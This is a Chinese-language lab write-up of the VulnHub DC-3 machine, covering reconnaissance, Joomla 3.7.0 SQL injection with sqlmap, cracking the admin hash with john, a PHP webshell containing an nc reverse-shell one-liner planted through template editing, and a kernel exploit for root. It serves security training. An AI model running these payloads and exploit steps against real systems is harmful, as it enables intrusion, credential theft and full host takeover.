首页 > 其他分享 >VulnHub-DC: 3

VulnHub-DC: 3

时间:2023-03-17 09:13:44浏览次数:63  
标签:www -- root DC 192.168 VulnHub data #__

靶机地址:https://www.vulnhub.com/entry/dc-32,312/

一、确定目标

目标:there is only one flag, one entry point and no clues at all.

二、信息收集

1、主机发现

扫描网络得到目标主机IP(nmap不如arp-scan速度快)

arp-scan -l |grep 192.168.11

┌──(root㉿kali)-[~]
└─# arp-scan -l |grep 192.168.11
Interface: eth0, type: EN10MB, MAC: 00:0c:29:51:7e:3f, IPv4: 192.168.11.128
192.168.11.1   00:50:56:c0:00:08       VMware, Inc.
192.168.11.1   00:50:56:fe:d0:93       VMware, Inc. (DUP: 2)
192.168.11.140 00:0c:29:7f:c1:a7       VMware, Inc.
192.168.11.254 00:50:56:e2:e7:c6       VMware, Inc.

目标IP:192.168.11.140

2、端口扫描

使用nmap进行端口扫描

nmap -A -Pn -p0-65535 192.168.11.140

┌──(root㉿kali)-[~]
└─# nmap -A -Pn -p0-65535 192.168.11.140
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-16 08:32 CST
Nmap scan report for 192.168.11.140
Host is up (0.00082s latency).
Not shown: 65535 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open http   Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:7F:C1:A7 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.82 ms 192.168.11.140

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.39 seconds

3、服务发现

目标主机仅开放80端口的Web服务,使用Joomla的CMS。

4、Web路径爆破

dirsearch -u 192.168.11.140 -e * -x 403

┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.11.140 -e * -x 403

_|. _ _ _ _ _ _|_   v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: admin | HTTP method: GET | Threads: 30 | Wordlist size: 9006

Output File: /root/.dirsearch/reports/192.168.11.140_23-03-16_09-43-26.txt

Error Log: /root/.dirsearch/logs/errors-23-03-16_09-43-26.log

Target: http://192.168.11.140/

[09:43:26] Starting:
[09:43:28] 200 -   18KB - /LICENSE.txt                                      
[09:43:29] 200 -   4KB - /README.txt                                      
[09:43:31] 301 - 324B - /administrator -> http://192.168.11.140/administrator/
[09:43:31] 200 -   2KB - /administrator/includes/                          
[09:43:31] 200 -   31B - /administrator/cache/                            
[09:43:31] 200 -   5KB - /administrator/                                  
[09:43:31] 301 - 329B - /administrator/logs -> http://192.168.11.140/administrator/logs/
[09:43:31] 200 -   31B - /administrator/logs/                              
[09:43:32] 301 - 314B - /bin -> http://192.168.11.140/bin/              
[09:43:32] 200 -   31B - /bin/                                            
[09:43:32] 301 - 316B - /cache -> http://192.168.11.140/cache/          
[09:43:32] 200 -   31B - /cache/                                          
[09:43:32] 200 -   31B - /cli/                                            
[09:43:32] 301 - 321B - /components -> http://192.168.11.140/components/
[09:43:32] 200 -   31B - /components/
[09:43:33] 200 -   0B - /configuration.php                                
[09:43:35] 200 -   3KB - /htaccess.txt                                    
[09:43:35] 301 - 317B - /images -> http://192.168.11.140/images/        
[09:43:35] 200 -   31B - /images/                                          
[09:43:35] 200 -   31B - /includes/                                        
[09:43:35] 301 - 319B - /includes -> http://192.168.11.140/includes/    
[09:43:35] 200 -   7KB - /index.php                                        
[09:43:36] 301 - 319B - /language -> http://192.168.11.140/language/    
[09:43:36] 200 -   31B - /layouts/                                        
[09:43:36] 301 - 320B - /libraries -> http://192.168.11.140/libraries/  
[09:43:36] 200 -   31B - /libraries/                                      
[09:43:36] 301 - 316B - /media -> http://192.168.11.140/media/          
[09:43:36] 200 -   31B - /media/                                          
[09:43:37] 301 - 318B - /modules -> http://192.168.11.140/modules/      
[09:43:37] 200 -   31B - /modules/                                        
[09:43:38] 301 - 318B - /plugins -> http://192.168.11.140/plugins/      
[09:43:38] 200 -   31B - /plugins/                                        
[09:43:39] 200 - 836B - /robots.txt.dist                                  
[09:43:41] 200 -   31B - /templates/                                      
[09:43:41] 200 -   0B - /templates/system/                                
[09:43:41] 200 -   31B - /templates/index.html                            
[09:43:41] 200 -   0B - /templates/beez3/                                
[09:43:41] 301 - 320B - /templates -> http://192.168.11.140/templates/  
[09:43:41] 200 -   0B - /templates/protostar/                            
[09:43:41] 301 - 314B - /tmp -> http://192.168.11.140/tmp/              
[09:43:41] 200 -   31B - /tmp/                                            
[09:43:42] 200 -   2KB - /web.config.txt                                  

Task Completed

读取/robots.txt.dist文件,发现后台登陆界面http://192.168.11.140/administrator/

猜测/templates/beez3/和/templates/protostar/应该是模板文件路径。

5、Web侦察

主页提示靶机只有一个flag,且获得flag必须获得root权限。

 

 

 

6、漏洞发现

使用Joomla专用扫描器joomscan扫描。

joomscan -u http://192.168.11.140/


  ____ _____ _____ __ __ ___   ___   __   _ _
  (_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)(   )(_)( )(_)( )   ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
                      (1337.today)

  --=[OWASP JoomScan
  +---++---==[Version : 0.0.7
  +---++---==[Update Date : [2018/09/23]
  +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
  --=[Code name : Self Challenge
  @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://192.168.11.140/ ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.11.140/administrator/components
http://192.168.11.140/administrator/modules
http://192.168.11.140/administrator/templates
http://192.168.11.140/images/banners


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.11.140/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found


Your Report : reports/192.168.11.140/                                                                      

可以看到joomla基本信息

通过searchsploit查看是否有可用EXP。

searchsploit Joomla 3.7.0

┌──(root㉿kali)-[~]
└─# searchsploit Joomla 3.7.0
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title                                                                             | Path
------------------------------------------------------------------------------------------- ---------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection                                                 | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting                             | php/webapps/43488.txt
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

可以看到有一个SQL注入漏洞和一个XSS漏洞,显然SQL注入漏洞才有更大可能使我们获取管理员账号密码登陆管理后台。

三、漏洞分析

查找并打开php/webapps/42033.txt文件

locate php/webapps/42033.txt

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

┌──(root㉿kali)-[~]
└─# locate php/webapps/42033.txt
/usr/share/exploitdb/exploits/php/webapps/42033.txt

┌──(root㉿kali)-[~]
└─# cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917


URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27


Using Sqlmap:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]


Parameter: list[fullordering] (GET)
  Type: boolean-based blind
  Title: Boolean-based blind - Parameter replace (DUAL)
  Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

  Type: error-based
  Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
  Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

  Type: AND/OR time-based blind
  Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
  Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

发现文档要求使用以指定语句运行sqlmap进行数据库爆破。

四、漏洞利用

1、SQL注入

1.1 爆库

sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys

发现joomladb数据库

1.2 爆表

sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

Database: joomladb
[76 tables]
+---------------------+
| #__assets           |
| #__associations     |
| #__banner_clients   |
| #__banner_tracks   |
| #__banners         |
| #__bsms_admin       |
| #__bsms_books       |
| #__bsms_comments   |
| #__bsms_locations   |
| #__bsms_mediafiles |
| #__bsms_message_typ |
| #__bsms_podcast     |
| #__bsms_series     |
| #__bsms_servers     |
| #__bsms_studies     |
| #__bsms_studytopics |
| #__bsms_teachers   |
| #__bsms_templatecod |
| #__bsms_templates   |
| #__bsms_timeset     |
| #__bsms_topics     |
| #__bsms_update     |
| #__categories       |
| #__contact_details |
| #__content_frontpag |
| #__content_rating   |
| #__content_types   |
| #__content         |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions       |
| #__fields_categorie |
| #__fields_groups   |
| #__fields_values   |
| #__fields           |
| #__finder_filters   |
| #__finder_links_ter |
| #__finder_links     |
| #__finder_taxonomy_ |
| #__finder_taxonomy |
| #__finder_terms_com |
| #__finder_terms     |
| #__finder_tokens_ag |
| #__finder_tokens   |
| #__finder_types     |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages       |
| #__menu_types       |
| #__menu             |
| #__messages_cfg     |
| #__messages         |
| #__modules_menu     |
| #__modules         |
| #__newsfeeds       |
| #__overrider       |
| #__postinstall_mess |
| #__redirect_links   |
| #__schemas         |
| #__session         |
| #__tags             |
| #__template_styles |
| #__ucm_base         |
| #__ucm_content     |
| #__ucm_history     |
| #__update_sites_ext |
| #__update_sites     |
| #__updates         |
| #__user_keys       |
| #__user_notes       |
| #__user_profiles   |
| #__user_usergroup_m |
| #__usergroups       |
| #__users           |
| #__utf8_conversion |
| #__viewlevels       |
+---------------------+

发现#__users

1.3 爆字段

注:

  • 询问是否要使用公共列存在性检查时手动选择选y进行爆破,一路回车爆不出字段。

  • 回车键选择默认字典“/usr/share/sqlmap/data/txt/common columns.txt”

sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| email | non-numeric |
| id | numeric |
| name | non-numeric |
| params | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+

发现idnamepasswordusername字段。

1.4 查询字段内容

sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "id,name,password,username" --dump -p list[fullordering]

Database: joomladb
Table: #__users
[1 entry]
+-----+-------+--------------------------------------------------------------+----------+
| id | name | password | username |
+-----+-------+--------------------------------------------------------------+----------+
| 629 | admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu | admin |
+-----+-------+--------------------------------------------------------------+----------+

发现密码经过HASH加密

2、HASH解密

2.1 保存密文

将密文保存到文件admin中

vi admin

┌──(root㉿kali)-[~]
└─# vi admin

┌──(root㉿kali)-[~]
└─# cat admin
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

2.2 使用john爆破

注:这里已经爆破了一遍,使用show参数查看

john admin

john -show admin

┌──(root㉿kali)-[~]
└─# john admin
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
No password hashes left to crack (see FAQ)

┌──(root㉿kali)-[~]
└─# john -show admin
?:snoopy

1 password hash cracked, 0 left

解密后的结果为:snoopy

账号:admin

密码:snoopy

2.3 登陆后台

尝试账号密码成功登陆管理后台http://192.168.11.140/administrator/

 

 

 

3、文件上传漏洞

3.1 上传文件

进入后台后,通过编辑模板上传webshell。

Extensions --> Templates --> Templates

 

 

 

编辑哪一个都可以,在这编辑Beez3模板。

 

 

 

在html目录下创建名为shell.php的webshell(创建+保存),内容为:

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.128 6666 >/tmp/f");?>

 

 

 

3.2 反弹SHELL

想要反弹webshell就要知道路径,前面Web路径爆破的时候爆出了模板路径,这里使用beez3模板,路径应该为:

http://192.168.11.140/templates/beez3/

发现为空白页,结合模板暴露的路径,尝试访问http://192.168.11.140/templates/beez3/html

 

 

 

发现了上传的shell.php文件,在kali中启动监听

nc -lvnp 6666

┌──(root㉿kali)-[~]
└─# nc -lvnp 6666
listening on [any] 6666 ...

访问shell.php:

http://192.168.11.140/templates/beez3/html/shell.php

访问后成功建立连接拿到Shell。

┌──(root㉿kali)-[~]
└─# nc -lvnp 6666
listening on [any] 6666 ...
connect to [192.168.11.128] from (UNKNOWN) [192.168.11.140] 37608
/bin/sh: 0: can't access tty; job control turned off
$

五、提权

无法进入root家目录,接下来就是想办法提权。

$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/var/www/html/templates/beez3/html
$ cd /root
/bin/sh: 6: cd: can't cd to /root

1、获取EXP

lsb_release命令补充:

LSB是Linux Standard Base(Linux标准库)的缩写, lsb_release命令用来与具体Linux发行版相关的Linux标准库信息。

注:LSB的译法有Linux标准库,Linux标准规范。CentOS最小化安装时默认没有这个命令,需要安装lsb_release使用命令。

1.1 查看系统内核

uname -a

lsb_release -a

$ uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial

1.2 查找内核漏洞

搜索基于4.4.0-21-generic内核的Ubuntu 16.04 LTS版本相关内核漏洞

searchsploit 4.4. Ubuntu 16.04

Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalatio | linux/local/39772.txt

1.3 查找并查看文件

locate linux/local/39772.txt

vi /usr/share/exploitdb/exploits/linux/local/39772.txt

┌──(root㉿kali)-[~]
└─# locate linux/local/39772.txt
/usr/share/exploitdb/exploits/linux/local/39772.txt

┌──(root㉿kali)-[~]
└─# vi /usr/share/exploitdb/exploits/linux/local/39772.txt

1.4 下载EXP

在文件的最后一行可以找到EXP链接

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

┌──(root㉿kali)-[~]
└─# wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
--2023-03-16 18:27:08-- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
正在解析主机 gitlab.com (gitlab.com)... 172.65.251.78, 2606:4700:90:0:f22e:fbec:5bed:a9b9
正在连接 gitlab.com (gitlab.com)|172.65.251.78|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:7025 (6.9K) [application/octet-stream]
正在保存至: “39772.zip”

39772.zip 100%[=====================================================>] 6.86K --.-KB/s 用时 0.005s

2023-03-16 18:27:11 (1.33 MB/s) - 已保存 “39772.zip” [7025/7025])

2、EXP传至靶机

kali开启http服务

python -m http.server 8888

┌──(root㉿kali)-[~]
└─# python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...

靶机去/tmp目录下下载39772.zip文件

cd /tmp

wget 192.168.11.128:8888/39772.zip

$ cd /tmp
$ pwd
/tmp
$ wget http://192.168.11.128:8888/39772.zip
--2023-03-16 20:29:14-- http://192.168.11.128:8888/39772.zip
Connecting to 192.168.11.128:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: '39772.zip'

0K ...... 100% 1.92G=0s

2023-03-16 20:29:14 (1.92 GB/s) - '39772.zip' saved [7025/7025]

$ ls -l
total 16
-rw-r--r-- 1 www-data www-data 7025 Mar 16 20:27 39772.zip
prw-r--r-- 1 www-data www-data 0 Mar 16 20:29 f
drwx------ 3 root root 4096 Mar 15 19:16 systemd-private-eebb69eeaac946d088ae7471b81b6ac6-systemd-timesyncd.service-oySBFs
drwx------ 2 root root 4096 Mar 15 19:16 vmware-root

3、本地提权

接下来就是解压、编译、执行EXP来获得root权限

3.1 解压EXP

解压39772.zip之后进入文件夹39772,再对exploit.tar文件进行解压得到ebpf_mapfd_doubleput_exploit文件。

unzip 39772.zip

cd 39772

tar -xvf exploit.tar

$ ls -l
total 16
-rw-r--r-- 1 www-data www-data 7025 Mar 16 20:27 39772.zip
prw-r--r-- 1 www-data www-data 0 Mar 17 10:22 f
drwx------ 3 root root 4096 Mar 17 2023 systemd-private-69003323551d4c3aaddd256cfdcdc1a4-systemd-timesyncd.service-qyTaDk
drwx------ 2 root root 4096 Mar 17 2023 vmware-root
$ unzip 39772.zip
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
$ ls -l
total 24
drwxr-xr-x 2 www-data www-data 4096 Aug 16 2016 39772
-rw-r--r-- 1 www-data www-data 7025 Mar 16 20:27 39772.zip
drwxrwxr-x 3 www-data www-data 4096 Aug 16 2016 __MACOSX
prw-r--r-- 1 www-data www-data 0 Mar 17 10:23 f
drwx------ 3 root root 4096 Mar 17 2023 systemd-private-69003323551d4c3aaddd256cfdcdc1a4-systemd-timesyncd.service-qyTaDk
drwx------ 2 root root 4096 Mar 17 2023 vmware-root
$ cd 39772
$ ls -l
total 32
-rw-r--r-- 1 www-data www-data 10240 Aug 16 2016 crasher.tar
-rw-r--r-- 1 www-data www-data 20480 Aug 16 2016 exploit.tar
$ tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
$ ls -l
total 36
-rw-r--r-- 1 www-data www-data 10240 Aug 16 2016 crasher.tar
drwxr-x--- 2 www-data www-data 4096 Apr 26 2016 ebpf_mapfd_doubleput_exploit
-rw-r--r-- 1 www-data www-data 20480 Aug 16 2016 exploit.tar

3.2 执行EXP

  • 查看EXP发现没有执行权限,先赋予权限。

  • 进入ebpf_mapfd_doubleput_exploit目录

  • 编译compile.sh文件

  • 执行编译好的doubleput文件

  • 提示we have root privs now...获取root权限

ls -Rl ebpf_mapfd_doubleput_exploit

chmod -R 777 ebpf_mapfd_doubleput_exploit

cd ebpf_mapfd_doubleput_exploit

./compile.sh

./doubleput

$ ls -Rl ebpf_mapfd_doubleput_exploit
ebpf_mapfd_doubleput_exploit:
total 20
-rwxr-x--- 1 www-data www-data 155 Apr 26 2016 compile.sh
-rw-r----- 1 www-data www-data 4188 Apr 26 2016 doubleput.c
-rw-r----- 1 www-data www-data 2186 Apr 26 2016 hello.c
-rw-r----- 1 www-data www-data 255 Apr 26 2016 suidhelper.c
$ chmod -R 777 ebpf_mapfd_doubleput_exploit
$ cd ebpf_mapfd_doubleput_exploit
$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
$ ls -l
total 52
-rwxrwxrwx 1 www-data www-data 155 Apr 26 2016 compile.sh
-rwxr-xr-x 1 www-data www-data 12336 Mar 17 10:36 doubleput
-rwxrwxrwx 1 www-data www-data 4188 Apr 26 2016 doubleput.c
-rwxr-xr-x 1 www-data www-data 8028 Mar 17 10:36 hello
-rwxrwxrwx 1 www-data www-data 2186 Apr 26 2016 hello.c
-rwxr-xr-x 1 www-data www-data 7524 Mar 17 10:36 suidhelper
-rwxrwxrwx 1 www-data www-data 255 Apr 26 2016 suidhelper.c
$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
whoami
root
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

至此成功提权。

六、后渗透(查找flag)

在root家目录中发现flag

cd /root

cat the-flag.txt

cd /root
ls -l
total 4
-rw-r--r-- 1 root root 604 Mar 26 2019 the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)


Congratulations are in order. :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!

至此打靶完成,游戏结束OVO

标签:www,--,root,DC,192.168,VulnHub,data,#__
From: https://www.cnblogs.com/HKalpa/p/17225373.html

相关文章

  • Dcat admin 多文件上传,七牛云云端上传
    进入官网  DcatAdmin-Php后台开发框架   这里要选择1.x下面来安装框架      安装完laravel之后,需要修改.env文件,设置数据库链接设置正确 ......
  • Vulnhub之Replay靶机详细测试过程(获得Root Shell)
    Replay作者:jasonhuawen靶机信息名称:Replay:1地址:https://www.vulnhub.com/entry/replay-1,278/识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/Replay]└......
  • flink cdc 读取mysql数据
    flinkcdc版本:1.14.0mysql版本:5.7 1、开启MySQL中binlog日志修改我们的配置文件my.cnf,增加:server_id=1log_bin=mysql-binbinlog_format=ROWexpire_logs_days=30......
  • VulnHub-DC: 8
    靶机地址:https://www.vulnhub.com/entry/dc-8,367/目标:getrootandtoreadtheoneandonlyflag一、主机扫描nmap-sP192.168.11.0/24|grep192.168.11|awk'......
  • Vulnhub之Rudra靶机详细测试过程
    Rudra作者:jasonhuawen靶机信息名称:HA:Rudra地址:https://www.vulnhub.com/entry/ha-rudra,386/识别目标主机IP地址(root......
  • vulnhub靶场之HACKSUDO: SEARCH
    准备:攻击机:虚拟机kali、本机win10。靶机:hacksudo:search,下载地址:https://download.vulnhub.com/hacksudo/hacksudo-search.zip,下载后直接vbox打开即可。知识点:文件包含......
  • 汇编 标志寄存器 ZF/PF/SF/CF/OF标志 adc/sbb/cmp指令 pushf和popf 检测比较结果
    标志寄存器CPU内部的寄存器中,有一种特殊的寄存器(对于不同的处理机,个数和结构都可能)具有以下3中作用。用来存储相关指令的某些执行结果。用来为CPU执行相关指令提供行为依据......
  • vulnhub靶场之PYLINGTON: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:Pylington:1,下载地址:https://download.vulnhub.com/pylington/pylington.ova,下载后直接vbox打开即可。知识点:敏感文件发现和利......
  • ElasticSearch 实现分词全文检索 - id、ids、prefix、fuzzy、wildcard、range、regexp
    目录ElasticSearch实现分词全文检索-概述ElasticSearch实现分词全文检索-ES、Kibana、IK安装ElasticSearch实现分词全文检索-Restful基本操作ElasticSearch......
  • RealWorldCTF渗透赛第二期复现-ctfshow
    比赛概述开始时间:2023年3月10日15时环境保留时间:72小时环境重置时间:20分钟官方wp链接:Docs(feishu.cn)【本次复现跟着官方WP进行,只做记录学习之用】0x1目标资产......